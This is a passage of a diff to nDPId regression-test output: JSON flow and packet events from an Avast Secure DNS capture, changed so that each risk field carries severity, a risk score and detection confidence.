 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1625482316411,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625482316411,"pkt":"eJS0JASgYDjgxTWgCABFAABDyvUAAH8R1DzAqAJktdYjlfvuAbsAL4YFMq4BAAABAAAAAAAAATIJU2VDVVJFZE5zBWFWYXNUA0NvbQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482316411,"flow_last_seen":1625482316411,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482316411,"flow_last_seen":1625482316411,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1625482316532,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625482316532,"pkt":"YDjgxTWgeJS0JASgCABFAADMlTUAADMRVXS11iOVwKgCZAG7++4AuP5zMq6BgAABAAEAAAAAATIJU2VDVVJFZE5zBWFWYXNUA0NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482318517,"flow_last_seen":1625482318517,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482318517,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1625482318517,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625482318517,"pkt":"eJS0JASgYDjgxTWgCABFAABDyvkAAH8R1DjAqAJktdYjlcjXAbsALzxZb7EBAAABAAAAAAAAATIJU2VDdXJlRG5TBUFWQVN0A0NvbQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482318517,"flow_last_seen":1625482318517,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482318517,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482318517,"flow_last_seen":1625482318517,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482318517,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1625482318634,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625482318634,"pkt":"YDjgxTWgeJS0JASgCABFAADMmQwAADIRUp211iOVwKgCZAG7yNcAuLTHb7GBgAABAAEAAAAAATIJU2VDdXJlRG5TBUFWQVN0A0NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482396199,"flow_last_seen":1625482396199,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482396199,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1625482396199,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625482396199,"pkt":"eJS0JASgYDjgxTWgCABFAABD9goAAH8RqSfAqAJktdYjlfkgAbsALyRTl04BAAABAAAAAAAAATIJc0VDdVJlZG5TBUFWQVN0A0NPbQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482396199,"flow_last_seen":1625482396199,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482396199,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482396199,"flow_last_seen":1625482396199,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482396199,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1625482396320,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625482396320,"pkt":"YDjgxTWgeJS0JASgCABFAADMN0IAADMRs2e11iOVwKgCZAG7+SAAuJzBl06BgAABAAEAAAAAATIJc0VDdVJlZG5TBUFWQVN0A0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482399044,"flow_last_seen":1625482399044,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482399044,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1625482399044,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625482399044,"pkt":"eJS0JASgYDjgxTWgCABFAABD9g4AAH8RqSPAqAJktdYjlcNYAbsAL0Y+i0sBAAABAAAAAAAAATIJU0VjVVJFRG5TBUF2QXN0A0NvbQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482399044,"flow_last_seen":1625482399044,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482399044,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482399044,"flow_last_seen":1625482399044,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482399044,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1625482399165,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625482399165,"pkt":"YDjgxTWgeJS0JASgCABFAADMOy8AADIRsHq11iOVwKgCZAG7w1gAuL6si0uBgAABAAEAAAAAATIJU0VjVVJFRG5TBUF2QXN0A0NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482401089,"flow_last_seen":1625482401089,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482401089,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1625482401089,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625482401089,"pkt":"eJS0JASgYDjgxTWgCABFAABD9hIAAH8RqR\/AqAJktdYjlcJJAbsAL3PfnlkBAAABAAAAAAAAATIJc0VjVVJFZE5zBUFWYXNUA2NvTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482401089,"flow_last_seen":1625482401089,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482401089,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482401089,"flow_last_seen":1625482401089,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482401089,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1625482401211,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625482401211,"pkt":"YDjgxTWgeJS0JASgCABFAADMPeEAADIRrci11iOVwKgCZAG7wkkAuOxNnlmBgAABAAEAAAAAATIJc0VjVVJFZE5zBUFWYXNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482318517,"flow_last_seen":1625482318634,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482316411,"flow_last_seen":1625482316532,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482318517,"flow_last_seen":1625482318634,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482316411,"flow_last_seen":1625482316532,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484544,"flow_last_seen":1625482484544,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1625482484544,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625482484544,"pkt":"eJS0JASgYDjgxTWgCABFAABD\/EEAAH8RovDAqAJktdYjlcqvAbsAL8hTAb8BAAABAAAAAAAAATIJU0VDVXJlRG5zBUFWYXN0A0NvTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484544,"flow_last_seen":1625482484544,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484544,"flow_last_seen":1625482484544,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1625482484661,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625482484661,"pkt":"YDjgxTWgeJS0JASgCABFAADMsJIAADIROxe11iOVwKgCZAG7yq8AuEDCAb+BgAABAAEAAAAAATIJU0VDVXJlRG5zBUFWYXN0A0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482484661,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1625482484661,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625482484661,"pkt":"eJS0JASgYDjgxTWgCABFAABD\/D0AAH8RovTAqAJktdYjlerfAbsAL5AIOXoBAAABAAAAAAAAATIJc0VjVXJlZE5TBUF2YXN0A2NPTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482484661,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482484661,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1625482484661,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625482484661,"pkt":"YDjgxTWgeJS0JASgCABFAADMo38AADIRSCq11iOVwKgCZAG76t8AuAh3OXqBgAABAAEAAAAAATIJc0VjVXJlZE5TBUF2YXN0A2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482486856,"flow_last_seen":1625482486856,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482486856,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
